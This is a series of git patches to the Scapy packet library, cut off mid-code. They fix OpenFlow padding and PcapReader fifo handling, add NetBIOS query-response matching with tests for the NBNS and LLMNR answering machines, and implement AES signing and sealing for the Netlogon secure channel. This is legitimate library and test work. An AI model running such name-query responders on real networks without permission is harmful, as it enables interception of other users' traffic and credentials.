01:52:23 +0300 Subject: [PATCH 1309/1632] tests: put LLDPDUPower tests in a separate test set (#4444) to skip them when tshark isn't installed and `-K tshark` is passed. Fixes ``` ... Traceback (most recent call last): ... FileNotFoundError: Could not execute tshark, is it installed? ``` It's a follow-up to a28c08903412e9f21a48c869f3759596015c3383 --- test/contrib/lldp.uts | 1 + 1 file changed, 1 insertion(+) diff --git a/test/contrib/lldp.uts b/test/contrib/lldp.uts index 6ae5a0f4bbb..bc9ed43b1d9 100644 --- a/test/contrib/lldp.uts +++ b/test/contrib/lldp.uts @@ -371,6 +371,7 @@ try: except: assert False ++ Power via MDI ~ tshark = Define check_tshark function From 460c98943b463efb1f933c7e962dfe038ed8ccee Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 27 Jun 2024 15:22:16 +0200 Subject: [PATCH 1310/1632] Fix OpenFlow3 padding bug (#4440) --- scapy/contrib/openflow3.py | 12 +++++------- test/contrib/openflow3.uts | 3 +++ 2 files changed, 8 insertions(+), 7 deletions(-) diff --git a/scapy/contrib/openflow3.py b/scapy/contrib/openflow3.py index 1f7bc15ce2f..6622ca59b8d 100755 --- a/scapy/contrib/openflow3.py +++ b/scapy/contrib/openflow3.py @@ -979,10 +979,8 @@ def post_build(self, p, pay): zero_bytes = (8 - tmp_len % 8) % 8 tmp_len = tmp_len + zero_bytes # add padding length p = p[:2] + struct.pack("!H", tmp_len) + p[4:] - else: - zero_bytes = (8 - tmp_len % 8) % 8 - # every message will be padded correctly - p += b"\x00" * zero_bytes + p += b"\x00" * zero_bytes + # message with user-defined length will not be automatically padded return p + pay def extract_padding(self, s): @@ -2697,9 +2695,9 @@ def post_build(self, p, pay): if tmp_len is None: tmp_len = len(p) + len(pay) p = p[:2] + struct.pack("!H", tmp_len) + p[4:] - # every message will be padded correctly - zero_bytes = (8 - tmp_len % 8) % 8 - p += b"\x00" * zero_bytes + zero_bytes = (8 - tmp_len % 8) % 8 + p += b"\x00" * zero_bytes + # message with user-defined length will not be automatically padded return p + pay def extract_padding(self, s): diff --git a/test/contrib/openflow3.uts b/test/contrib/openflow3.uts index 743a62ecced..d423af65e18 100755 --- a/test/contrib/openflow3.uts +++ b/test/contrib/openflow3.uts @@ -74,6 +74,9 @@ assert len(fpti) == 16 assert fpti.instruction_ids[0].type == 1 assert fpti.instruction_ids[1].type == 5 +fpti.instruction_ids[0] = OFPITGotoTableID() +assert bytes(fpti) == b'\x00\x00\x00\x0c\x00\x01\x00\x04\x00\x05\x00\x04\x00\x00\x00\x00' + = OFPTPacketIn() containing an Ethernet frame ofm = OFPTPacketIn(data=Ether()/IP()/ICMP()) p = OFPTPacketIn(raw(ofm)) From b13236f17a4f84ea95db301426061703adf4f745 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 27 Jun 2024 15:22:44 +0200 Subject: [PATCH 1311/1632] Allow reading from fifo in *PcapReader* (#4428) --- scapy/utils.py | 20 ++++++++++++-------- test/regression.uts | 12 ++++++++++++ 2 files changed, 24 insertions(+), 8 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index be58581950a..5ab9745fb9a 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1427,12 +1427,14 @@ def open(fname # type: Union[IO[bytes], str] """Open (if necessary) filename, and read the magic.""" if isinstance(fname, str): filename = fname - try: - fdesc = gzip.open(filename, "rb") # type: _ByteStream - magic = fdesc.read(4) - except IOError: - fdesc = open(filename, "rb") - magic = fdesc.read(4) + fdesc = open(filename, "rb") # type: _ByteStream + magic = fdesc.read(2) + if magic == b"\x1f\x8b": + # GZIP header detected. + fdesc.seek(0) + fdesc = gzip.GzipFile(fileobj=fdesc) + magic = fdesc.read(2) + magic += fdesc.read(2) else: fdesc = fname filename = getattr(fdesc, "name", "No name") @@ -1558,8 +1560,10 @@ def fileno(self): return -1 if WINDOWS else self.f.fileno() def close(self): - # type: () -> Optional[Any] - return self.f.close() + # type: () -> None + if isinstance(self.f, gzip.GzipFile): + self.f.fileobj.close() # type: ignore + self.f.close() def __exit__(self, exc_type, exc_value, tracback): # type: (Optional[Any], Optional[Any], Optional[Any]) -> None diff --git a/test/regression.uts b/test/regression.uts index 64791fbd7cc..fb648178ab1 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2225,6 +2225,18 @@ wrpcapng(tmpfile, p) l = rdpcap(tmpfile) assert l[0].comment == p.comment += rdpcap on fifo +~ linux +f = get_temp_file() +os.unlink(f) +os.mkfifo(f) +p = Ether(bytes(Ether(dst="ff:ff:ff:ff:ff:ff")/"Hello Scapy!!!")) +s = AsyncSniffer(offline=f) +s.start() +wrpcap(f, p) +s.join(timeout=1) +assert s.results[0] == p + = Check multiple packets with different combination of linktype,comment,direction,sniffed_on fields. test both wrpcap() and wrpcapng() import random,string random.seed(0x2807) From 31b3588bca45108f5489a16141a02c3a5d4c3804 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 27 Jun 2024 20:41:44 +0200 Subject: [PATCH 1312/1632] Netbios: detect query response (#4445) * Netbios: detect query response * Move NetBIOSNameField to Python3 --- doc/scapy/usage.rst | 8 ++++++++ scapy/fields.py | 20 ++++++++++++-------- scapy/layers/netbios.py | 16 +++++++++++++--- test/answering_machines.uts | 8 ++++---- test/scapy/layers/netbios.uts | 19 ++++++++++++++++--- 5 files changed, 53 insertions(+), 18 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index d22ee028028..d4782e5b49f 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -1483,6 +1483,14 @@ Node status request (get NetbiosName from IP) >>> sr1(IP(dst="192.168.122.17")/UDP()/NBNSHeader()/NBNSNodeStatusRequest()) +NBNS Query Request (find by NetbiosName) +---------------------------------------- + +.. code:: + + >>> conf.checkIPaddr = False # Mandatory because we are using a broadcast destination + >>> sr1(IP(dst="192.168.0.255")/UDP()/NBNSHeader()/NBNSQueryRequest(QUESTION_NAME="DC1")) + Advanced traceroute ------------------- diff --git a/scapy/fields.py b/scapy/fields.py index 0caab13d1ff..3e459bf5615 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -32,7 +32,7 @@ RandSLong, RandFloat from scapy.data import EPOCH from scapy.error import log_runtime, Scapy_Exception -from scapy.compat import bytes_hex, chb, orb, plain_str, raw, bytes_encode +from scapy.compat import bytes_hex, plain_str, raw, bytes_encode from scapy.pton_ntop import inet_ntop, inet_pton from scapy.utils import inet_aton, inet_ntoa, lhex, mac2str, str2mac, EDecimal from scapy.utils6 import in6_6to4ExtractAddr, in6_isaddr6to4, \ @@ -1947,21 +1947,25 @@ def i2m(self, pkt, y): x += b" " * len_pkt x = x[:len_pkt] x = b"".join( - chb(0x41 + (orb(b) >> 4)) + - chb(0x41 + (orb(b) & 0xf)) + struct.pack( + "!BB", + 0x41 + (b >> 4), + 0x41 + (b & 0xf), + ) for b in x - ) # noqa: E501 + ) return b" " + x def m2i(self, pkt, x): # type: (Optional[Packet], bytes) -> bytes - x = x[1:].strip(b"\x00").strip(b" ") + x = x[1:].strip(b"\x00") return b"".join(map( - lambda x, y: chb( - (((orb(x) - 1) & 0xf) << 4) + ((orb(y) - 1) & 0xf) + lambda x, y: struct.pack( + "!B", + (((x - 1) & 0xf) << 4) + ((y - 1) & 0xf) ), x[::2], x[1::2] - )) + )).rstrip(b" ") class StrLenField(StrField): diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 3a173e7d608..c41e532330c 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -130,6 +130,10 @@ class NBNSHeader(Packet): ShortField("ARCOUNT", 0), ] + def hashret(self): + return b"NBNS" + struct.pack("!B", self.OPCODE) + + # Name Query Request # RFC1002 sect 4.2.12 @@ -144,7 +148,7 @@ class NBNSQueryRequest(Packet): def mysummary(self): return "NBNSQueryRequest who has '\\\\%s'" % ( - self.QUESTION_NAME.strip().decode(errors="backslashreplace") + self.QUESTION_NAME.decode(errors="backslashreplace") ) @@ -184,10 +188,16 @@ def mysummary(self): if not self.ADDR_ENTRY: return "NBNSQueryResponse" return "NBNSQueryResponse '\\\\%s' is at %s" % ( - self.RR_NAME.strip().decode(errors="backslashreplace"), + self.RR_NAME.decode(errors="backslashreplace"), self.ADDR_ENTRY[0].NB_ADDRESS ) + def answers(self, other): + return ( + isinstance(other, NBNSQueryRequest) and + other.QUESTION_NAME == self.RR_NAME + ) + bind_layers(NBNSHeader, NBNSQueryResponse, # RD+AA OPCODE=0x0, NM_FLAGS=0x50, RESPONSE=1, ANCOUNT=1) @@ -206,7 +216,7 @@ class NBNSNodeStatusRequest(NBNSQueryRequest): def mysummary(self): return "NBNSNodeStatusRequest who has '\\\\%s'" % ( - self.QUESTION_NAME.strip().decode(errors="backslashreplace") + self.QUESTION_NAME.decode(errors="backslashreplace") ) diff --git a/test/answering_machines.uts b/test/answering_machines.uts index a9a8517acd9..9a7ce4b1343 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -128,9 +128,9 @@ assert DNS_am().make_reply( = LLMNR_am def check_LLMNR_am_am_reply(packet): - assert packet[Ether].src == get_if_hwaddr(conf.iface) + # assert packet[Ether].src == get_if_hwaddr(conf.iface) assert packet[Ether].dst == "aa:aa:aa:aa:aa:aa" - assert packet[IP].src == get_if_addr(conf.iface) + # assert packet[IP].src == get_if_addr(conf.iface) assert packet[IP].dst == "192.168.0.1" assert packet[UDP].dport == 51938 assert packet[UDP].sport == 5355 @@ -261,13 +261,13 @@ def check_NBNS_am_reply(name): packet.show() assert packet[Ether].src != "ff:ff:ff:ff:ff:ff" assert packet[Ether].dst == "aa:aa:aa:aa:aa:aa" - assert NBNSQueryResponse in packet and packet[NBNSQueryResponse].RR_NAME.strip() == bytes_encode(name) + assert NBNSQueryResponse in packet and packet[NBNSQueryResponse].RR_NAME == name return check for server_name in (None, "", b"test", "test"): test_am(NBNS_am, Ether(src="aa:aa:aa:aa:aa:aa", dst="ff:ff:ff:ff:ff:ff")/IP()/UDP()/NBNSHeader()/NBNSQueryRequest(QUESTION_NAME="test"), - check_NBNS_am_reply("test"), + check_NBNS_am_reply(b"test"), server_name=server_name) test_am(NBNS_am, diff --git a/test/scapy/layers/netbios.uts b/test/scapy/layers/netbios.uts index f79799152b6..f99ddbfd649 100644 --- a/test/scapy/layers/netbios.uts +++ b/test/scapy/layers/netbios.uts @@ -14,7 +14,7 @@ assert raw(z) == b'\x00\x00\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00 FEEFFDFEDBCA pkt = IP(dst='192.168.0.255')/UDP(sport=137, dport='netbios_ns')/z pkt = IP(raw(pkt)) -assert pkt.QUESTION_NAME == b'TEST1 ' +assert pkt.QUESTION_NAME == b'TEST1' assert pkt[NBNSQueryRequest].mysummary() == r"NBNSQueryRequest who has '\\TEST1'" assert NBNSQueryRequest in NBNSHeader(raw(z)) @@ -36,10 +36,23 @@ z = NBNSQueryResponse(b' PPFCEFEECACACACACACACACACACACAAA\x00\x00 \x00\x01\x00\x assert z.mysummary() == r"NBNSQueryResponse '\\\xffRED' is at 192.168.0.13" z = NBNSHeader(b'/S\x85\x80\x00\x00\x00\x01\x00\x00\x00\x00 FAEPFEEBFEEPCACACACACACACACACAAA\x00\x00 \x00\x01\x00\x03\xf4\x80\x00\x06\x00\x00\xc0\xa8\x01A') -assert z.RR_NAME == b'POTATO ' +assert z.RR_NAME == b'POTATO' assert z.ADDR_ENTRY[0].G == 0 assert z.ADDR_ENTRY[0].NB_ADDRESS == "192.168.1.65" += NBNSQueryResponse answers NBNSQueryRequest + +req = IP(ihl=5, len=78, proto=17, chksum=8562, src='172.19.0.7', dst='172.19.0.255')/UDP(sport=137, dport=137, len=58, chksum=62101)/NBNSHeader(NM_FLAGS=17, QDCOUNT=1)/NBNSQueryRequest(QUESTION_NAME=b'Loremipsumdolor', SUFFIX=17217) +resp = IP(b'E\x00\x00Zn\xab@\x00@\x11s\xb5\xac\x13\x00\x05\xac\x13\x00\x07\x00\x89\x00\x89\x00FX\x8a\x00\x00\x85\x00\x00\x00\x00\x01\x00\x00\x00\x00 EMGPHCGFGNGJHAHDHFGNGEGPGMGPHCCA\x00\x00 \x00\x01\x00\x00\x00\xa5\x00\x06\x00\x00\xac\x13\x00\x05') + +try: + conf.checkIPaddr = True + assert not resp.answers(req) + conf.checkIPaddr = False + assert resp.answers(req) +finally: + conf.checkIPaddr = True + = NBNSNodeStatusResponse - build & dissect z = NBNSHeader()/NBNSNodeStatusResponse(NODE_NAME=[NBNSNodeStatusResponseService(NETBIOS_NAME="WINDOWS")], MAC_ADDRESS="aa:aa:aa:aa:aa:aa") @@ -66,7 +79,7 @@ assert z.mysummary() == r"NBNSNodeStatusRequest who has '\\\xff'" z = NBNSHeader()/NBNSWackResponse(RR_NAME="SARAH") assert raw(z) == b'\x00\x00\xbc\x00\x00\x00\x00\x01\x00\x00\x00\x00 FDEBFCEBEICACACACACACACACACACAAA\x00\x00 \x00\x01\x00\x00\x00\x02\x00\x02)\x10' pkt = NBNSHeader(raw(z)) -assert pkt[NBNSWackResponse].RR_NAME == b'SARAH ' +assert pkt[NBNSWackResponse].RR_NAME == b'SARAH' = NBTSession From 8ed8647688aca4f6d07d52807e2299eba827b710 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 29 Jun 2024 18:18:18 +0200 Subject: [PATCH 1313/1632] [win] Netlogon: support AES (#4447) --- doc/scapy/layers/http.rst | 15 +- scapy/layers/dcerpc.py | 12 +- scapy/layers/msrpce/msnrpc.py | 579 +++++++++++++++++++++++-------- scapy/layers/msrpce/rpcclient.py | 13 +- scapy/layers/smb2.py | 3 + test/scapy/layers/msnrpc.uts | 245 +++++++++++-- 6 files changed, 689 insertions(+), 178 deletions(-) diff --git a/doc/scapy/layers/http.rst b/doc/scapy/layers/http.rst index ec9879d1d29..b7c5d5811fa 100644 --- a/doc/scapy/layers/http.rst +++ b/doc/scapy/layers/http.rst @@ -154,17 +154,28 @@ Start an unauthenticated HTTP server automaton: iface="eth0", ) -We could also have started the same server, but requiring NTLM authorization using: +We could also have started the same server, but requiring **NTLM authorization using**: .. code:: python server = HTTP_Server.spawn( port=8080, iface="eth0", - HTTP_AUTH_MECHS.NTLM, + mech=HTTP_AUTH_MECHS.NTLM, ssp=NTLMSSP(IDENTITIES={"user": MD4le("password")}), ) +Or **basic auth**: + +.. code:: python + + server = HTTP_Server.spawn( + port=8080, + iface="eth0", + mech=HTTP_AUTH_MECHS.BASIC, + BASIC_IDENTITIES={"user": MD4le("password")}, + ) + - ``TCP_client.tcplink``: Send an HTTPRequest to ``www.secdev.org`` and write the result in a file: diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index edafae91585..58dcd1534b4 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -340,7 +340,7 @@ class NL_AUTH_SIGNATURE(Packet): { 0xFFFF: "Unencrypted", 0x007A: "RC4", - 0x00A1: "AES-128", + 0x001A: "AES-128", }, ), XLEShortField("Pad", 0xFFFF), @@ -2671,8 +2671,8 @@ def in_pkt(self, pkt): opnum, opts = self._up_pkt(pkt) # Check for encrypted payloads body = None - if conf.raw_layer in pkt: - body = bytes(pkt[conf.raw_layer]) + if conf.raw_layer in pkt.payload: + body = bytes(pkt.payload[conf.raw_layer]) # If we are doing passive sniffing if conf.dcerpc_session_enable and conf.winssps_passive: # We have Windows SSPs, and no current context @@ -2801,18 +2801,18 @@ def in_pkt(self, pkt): "Unknown opnum %s for interface %s" % (opnum, self.rpc_bind_interface) ) - pkt[conf.raw_layer].load = body + pkt.payload[conf.raw_layer].load = body return pkt if body: # Dissect payload using class payload = cls(body, ndr64=self.ndr64, ndrendian=self.ndrendian, **opts) - pkt[conf.raw_layer].underlayer.remove_payload() + pkt.payload[conf.raw_layer].underlayer.remove_payload() pkt /= payload elif not cls.fields_desc: # Request class has no payload pkt /= cls(ndr64=self.ndr64, ndrendian=self.ndrendian, **opts) elif body: - pkt[conf.raw_layer].load = body + pkt.payload[conf.raw_layer].load = body return pkt def out_pkt(self, pkt): diff --git a/scapy/layers/msrpce/msnrpc.py b/scapy/layers/msrpce/msnrpc.py index a20f1aa32f7..7c3144649f8 100644 --- a/scapy/layers/msrpce/msnrpc.py +++ b/scapy/layers/msrpce/msnrpc.py @@ -9,11 +9,13 @@ https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f """ +import enum import os import struct import time from scapy.config import conf, crypto_validator +from scapy.fields import FlagValue, FlagsField from scapy.layers.dcerpc import ( find_dcerpc_interface, DCE_C_AUTHN_LEVEL, @@ -28,7 +30,11 @@ ) from scapy.layers.ntlm import RC4, RC4K, RC4Init, SSP -from scapy.layers.msrpce.rpcclient import DCERPC_Client, DCERPC_Transport +from scapy.layers.msrpce.rpcclient import ( + DCERPC_Client, + DCERPC_Transport, + STATUS_ERREF, +) from scapy.layers.msrpce.raw.ms_nrpc import ( NetrServerAuthenticate3_Request, NetrServerAuthenticate3_Response, @@ -56,11 +62,70 @@ # --- RFC +# [MS-NRPC] sect 3.1.4.2 +_negotiateFlags = { + # Not used. MUST be ignored on receipt. + 0x00000001: "A", + # B: BDCs persistently try to update their database to the PDC's + # version after they get a notification indicating that their + # database is out-of-date. + 0x00000002: "BDCContinuousUpdate", + # C: Supports RC4 encryption. + 0x00000004: "RC4", + # Not used. MUST be ignored on receipt. + 0x00000008: "D", + # E: Supports BDCs handling CHANGELOGs. + 0x00000010: "BDCChangelog", + # F: Supports restarting of full synchronization between DCs. + 0x00000020: "RestartingDCSync", + # G: Does not require ValidationLevel 2 fornongeneric passthrough. + 0x00000040: "NoValidationLevel2", + # H: Supports the NetrDatabaseRedo (Opnum 17) functionality + 0x00000080: "DatabaseRedo", + # I: Supports refusal of password changes. + 0x00000100: "RefusalPasswordChange", + # J: Supports the NetrLogonSendToSam (Opnum 32) functionality. + 0x00000200: "SendToSam", + # K: Supports generic pass-through authentication. + 0x00000400: "Generic-passthrough", + # L: Supports concurrent RPC calls. + 0x00000800: "ConcurrentRPC", + # M: Supports avoiding of user account database replication. + 0x00001000: "AvoidRepliAccountDB", + # N: Supports avoiding of Security Authority database replication. + 0x00002000: "AvoidRepliAuthorityDB", + # O: Supports strong keys. + 0x00004000: "StrongKeys", + # P: Supports transitive trusts. + 0x00008000: "TransitiveTrust", + # Not used. MUST be ignored on receipt. + 0x00010000: "Q", + # R: Supports the NetrServerPasswordSet2 functionality. + 0x00020000: "ServerPasswordSet2", + # S: Supports the NetrLogonGetDomainInfo functionality. + 0x00040000: "GetDomainInfo", + # T: Supports cross-forest trusts. + 0x00080000: "CrossForestTrust", + # U: The server ignores the NT4Emulator ADM element. + 0x00100000: "NoNT4Emul", + # V: Supports RODC pass-through to different domains. + 0x00200000: "RODC-passthrough", + # W: Supports Advanced Encryption Standard (AES) encryption and SHA2 hashing. + 0x01000000: "AES", + # Supports Kerberos as the security support provider for secure channel setup. + 0x20000000: "Kerberos", + # Y: Supports Secure RPC. + 0x40000000: "SecureRPC", + # Not used. MUST be ignored on receipt. + 0x80000000: "Z", +} +_negotiateFlags = FlagsField("", 0, -32, _negotiateFlags).names + # [MS-NRPC] sect 3.1.4.3.1 @crypto_validator -def ComputeSessionKeyAES(NTOWFv1Hash, ClientChallenge, ServerChallenge): - M4SS = NTOWFv1Hash +def ComputeSessionKeyAES(HashNt, ClientChallenge, ServerChallenge): + M4SS = HashNt h = hmac.HMAC(M4SS, hashes.SHA256()) h.update(ClientChallenge) h.update(ServerChallenge) @@ -69,8 +134,8 @@ def ComputeSessionKeyAES(NTOWFv1Hash, ClientChallenge, ServerChallenge): # [MS-NRPC] sect 3.1.4.3.2 @crypto_validator -def ComputeSessionKeyStrongKey(NTOWFv1Hash, ClientChallenge, ServerChallenge): - M4SS = NTOWFv1Hash +def ComputeSessionKeyStrongKey(HashNt, ClientChallenge, ServerChallenge): + M4SS = HashNt digest = hashes.Hash(hashes.MD5()) digest.update(b"\x00\x00\x00\x00") digest.update(ClientChallenge) @@ -83,9 +148,9 @@ def ComputeSessionKeyStrongKey(NTOWFv1Hash, ClientChallenge, ServerChallenge): # [MS-NRPC] sect 3.1.4.4.1 @crypto_validator def ComputeNetlogonCredentialAES(Input, Sk): - cipher = Cipher(algorithms.AES(Sk), mode=modes.CFB(b"\x00" * 16)) + cipher = Cipher(algorithms.AES(Sk), mode=modes.CFB8(b"\x00" * 16)) encryptor = cipher.encryptor() - return encryptor.update(Input) + encryptor.finalize() + return encryptor.update(Input) # [MS-NRPC] sect 3.1.4.4.2 @@ -123,23 +188,6 @@ def _credentialAddition(cred, i): ) -def NewAuthenticatorAndCredential(ClientStoredCredential, Sk): - ts = int(time.time()) - ClientStoredCredential = _credentialAddition(ClientStoredCredential, ts) - return ( - PNETLOGON_AUTHENTICATOR( - Credential=PNETLOGON_CREDENTIAL( - data=ComputeNetlogonCredentialDES( - ClientStoredCredential, - Sk, - ), - ), - Timestamp=ts, - ), - ClientStoredCredential, - ) - - # [MS-NRPC] sect 3.3.4.2.1 @@ -153,7 +201,17 @@ def ComputeCopySeqNumber(ClientSequenceNumber, client): @crypto_validator -def ComputeNetlogonSignature(nl_auth_sig, message, SessionKey, Confounder=None): +def ComputeNetlogonChecksumAES(nl_auth_sig, message, SessionKey, Confounder=None): + h = hmac.HMAC(SessionKey, hashes.SHA256()) + h.update(nl_auth_sig[:8]) + if Confounder: + h.update(Confounder) + h.update(message) + return h.finalize() + + +@crypto_validator +def ComputeNetlogonChecksumMD5(nl_auth_sig, message, SessionKey, Confounder=None): digest = hashes.Hash(hashes.MD5()) digest.update(b"\x00\x00\x00\x00") digest.update(nl_auth_sig[:8]) @@ -166,7 +224,12 @@ def ComputeNetlogonSignature(nl_auth_sig, message, SessionKey, Confounder=None): @crypto_validator -def ComputeNetlogonSealingKey(SessionKey, CopySeqNumber): +def ComputeNetlogonSealingKeyAES(SessionKey): + return bytes(bytearray((x ^ 0xF0) for x in bytearray(SessionKey))) + + +@crypto_validator +def ComputeNetlogonSealingKeyRC4(SessionKey, CopySeqNumber): XorKey = bytes(bytearray((x ^ 0xF0) for x in bytearray(SessionKey))) h = hmac.HMAC(XorKey, hashes.MD5()) h.update(b"\x00\x00\x00\x00") @@ -176,7 +239,7 @@ def ComputeNetlogonSealingKey(SessionKey, CopySeqNumber): @crypto_validator -def ComputeNetlogonSequenceNumberKey(SessionKey, Checksum): +def ComputeNetlogonSequenceNumberKeyMD5(SessionKey, Checksum): h = hmac.HMAC(SessionKey, hashes.MD5()) h.update(b"\x00\x00\x00\x00") h = hmac.HMAC(h.finalize(), hashes.MD5()) @@ -202,15 +265,16 @@ class CONTEXT(SSP.CONTEXT): "AES", ] - def __init__(self, IsClient, req_flags=None): + def __init__(self, IsClient, req_flags=None, AES=True): self.state = NetlogonSSP.STATE.INIT self.IsClient = IsClient self.ClientSequenceNumber = 0 - self.AES = False + self.AES = AES super(NetlogonSSP.CONTEXT, self).__init__(req_flags=req_flags) - def __init__(self, SessionKey, computername, domainname, **kwargs): + def __init__(self, SessionKey, computername, domainname, AES=True, **kwargs): self.SessionKey = SessionKey + self.AES = AES self.computername = computername self.domainname = domainname super(NetlogonSSP, self).__init__(**kwargs) @@ -218,46 +282,93 @@ def __init__(self, SessionKey, computername, domainname, **kwargs): def _secure(self, Context, msgs, Seal): """ Internal function used by GSS_WrapEx and GSS_GetMICEx + + [MS-NRPC] 3.3.4.2.1 """ # Concatenate the ToSign ToSign = b"".join(x.data for x in msgs if x.sign) - # [MS-NRPC] 3.3.4.2.1, AES not negotiated - signature = NL_AUTH_SIGNATURE( - SignatureAlgorithm=0x0077, - SealAlgorithm=0x007A if Seal else 0xFFFF, - ) Confounder = None if Seal: Confounder = os.urandom(8) + + if Context.AES: + # 1. If AES is negotiated + signature = NL_AUTH_SIGNATURE( + SignatureAlgorithm=0x0013, + SealAlgorithm=0x001A if Seal else 0xFFFF, + ) + else: + # 2. If AES is not negotiated + signature = NL_AUTH_SIGNATURE( + SignatureAlgorithm=0x0077, + SealAlgorithm=0x007A if Seal else 0xFFFF, + ) + # 3. Pad filled with 0xff (OK) + # 4. Flags with 0x00 (OK) + # 5. SequenceNumber SequenceNumber = ComputeCopySeqNumber( Context.ClientSequenceNumber, Context.IsClient ) + # 6. The ClientSequenceNumber MUST be incremented by 1 Context.ClientSequenceNumber += 1 - signature.Checksum = ComputeNetlogonSignature( - bytes(signature), ToSign, self.SessionKey, Confounder - )[:8] + # 7. Signature + if Context.AES: + signature.Checksum = ComputeNetlogonChecksumAES( + bytes(signature), ToSign, self.SessionKey, Confounder + )[:8] + else: + signature.Checksum = ComputeNetlogonChecksumMD5( + bytes(signature), ToSign, self.SessionKey, Confounder + )[:8] + # 8. If the Confidentiality option is requested, the Confounder field and + # the data MUST be encrypted if Seal: - # 3.3.4.2.1 pt 8 - EncryptionKey = ComputeNetlogonSealingKey(self.SessionKey, SequenceNumber) + if Context.AES: + EncryptionKey = ComputeNetlogonSealingKeyAES(self.SessionKey) + else: + EncryptionKey = ComputeNetlogonSealingKeyRC4( + self.SessionKey, SequenceNumber + ) # Encrypt Confounder and data - handle = RC4Init(EncryptionKey) - signature.Confounder = RC4(handle, Confounder) - # DOC IS WRONG ! - # > The server MUST initialize RC4 only once, before encrypting - # > the Confounder field. - # But, this fails ! as Samba put it: - # > For RC4, Windows resets the cipherstate after encrypting - # > the confounder, thus defeating the purpose of the confounder - handle = RC4Init(EncryptionKey) - for msg in msgs: - if msg.conf_req_flag: - msg.data = RC4(handle, msg.data) - # 3.3.4.2.1 pt 9 - EncryptionKey = ComputeNetlogonSequenceNumberKey( - self.SessionKey, signature.Checksum - ) - signature.SequenceNumber = RC4K(EncryptionKey, SequenceNumber) + if Context.AES: + IV = SequenceNumber * 2 + encryptor = Cipher( + algorithms.AES(EncryptionKey), mode=modes.CFB8(IV) + ).encryptor() + # Confounder + signature.Confounder = encryptor.update(Confounder) + # data + for msg in msgs: + if msg.conf_req_flag: + msg.data = encryptor.update(msg.data) + else: + handle = RC4Init(EncryptionKey) + # Confounder + signature.Confounder = RC4(handle, Confounder) + # DOC IS WRONG ! + # > The server MUST initialize RC4 only once, before encrypting + # > the Confounder field. + # But, this fails ! as Samba put it: + # > For RC4, Windows resets the cipherstate after encrypting + # > the confounder, thus defeating the purpose of the confounder + handle = RC4Init(EncryptionKey) + # data + for msg in msgs: + if msg.conf_req_flag: + msg.data = RC4(handle, msg.data) + # 9. The SequenceNumber MUST be encrypted. + if Context.AES: + EncryptionKey = self.SessionKey + IV = signature.Checksum * 2 + cipher = Cipher(algorithms.AES(EncryptionKey), mode=modes.CFB8(IV)) + encryptor = cipher.encryptor() + signature.SequenceNumber = encryptor.update(SequenceNumber) + else: + EncryptionKey = ComputeNetlogonSequenceNumberKeyMD5( + self.SessionKey, signature.Checksum + ) + signature.SequenceNumber = RC4K(EncryptionKey, SequenceNumber) return ( msgs, @@ -267,38 +378,84 @@ def _secure(self, Context, msgs, Seal): def _unsecure(self, Context, msgs, signature, Seal): """ Internal function used by GSS_UnwrapEx and GSS_VerifyMICEx + + [MS-NRPC] 3.3.4.2.2 """ assert isinstance(signature, NL_AUTH_SIGNATURE) - # [MS-NRPC] sect 3.3.4.2.2 AES not negotiated - # 3.3.4.2.2 pt 5 - EncryptionKey = ComputeNetlogonSequenceNumberKey( - self.SessionKey, signature.Checksum - ) - SequenceNumber = RC4K(EncryptionKey, signature.SequenceNumber) - # 3.3.4.2.2 pt 6/7 + # 1. The SignatureAlgorithm bytes MUST be verified + if (Context.AES and signature.SignatureAlgorithm != 0x0013) or ( + not Context.AES and signature.SignatureAlgorithm != 0x0077 + ): + raise ValueError("Invalid SignatureAlgorithm !") + + # 5. The SequenceNumber MUST be decrypted. + if Context.AES: + EncryptionKey = self.SessionKey + IV = signature.Checksum * 2 + cipher = Cipher(algorithms.AES(EncryptionKey), mode=modes.CFB8(IV)) + decryptor = cipher.decryptor() + SequenceNumber = decryptor.update(signature.SequenceNumber) + else: + EncryptionKey = ComputeNetlogonSequenceNumberKeyMD5( + self.SessionKey, signature.Checksum + ) + SequenceNumber = RC4K(EncryptionKey, signature.SequenceNumber) + # 6. A local copy of SequenceNumber MUST be computed CopySeqNumber = ComputeCopySeqNumber( Context.ClientSequenceNumber, not Context.IsClient ) - Context.ClientSequenceNumber += 1 + # 7. The SequenceNumber MUST be compared to CopySeqNumber if SequenceNumber != CopySeqNumber: raise ValueError("ERROR: SequenceNumber don't match") + # 8. ClientSequenceNumber MUST be incremented. + Context.ClientSequenceNumber += 1 + # 9. If the Confidentiality option is requested, the Confounder and the + # data MUST be decrypted. Confounder = None if Seal: - # 3.3.4.2.2 pt 9 - EncryptionKey = ComputeNetlogonSealingKey(self.SessionKey, SequenceNumber) - Confounder = RC4K(EncryptionKey, signature.Confounder) - for msg in msgs: - if msg.conf_req_flag: - msg.data = RC4K(EncryptionKey, msg.data) + if Context.AES: + EncryptionKey = ComputeNetlogonSealingKeyAES(self.SessionKey) + else: + EncryptionKey = ComputeNetlogonSealingKeyRC4( + self.SessionKey, SequenceNumber + ) + # Decrypt Confounder and data + if Context.AES: + IV = SequenceNumber * 2 + decryptor = Cipher( + algorithms.AES(EncryptionKey), mode=modes.CFB8(IV) + ).decryptor() + # Confounder + Confounder = decryptor.update(signature.Confounder) + # data + for msg in msgs: + if msg.conf_req_flag: + msg.data = decryptor.update(msg.data) + else: + # Confounder + EncryptionKey = 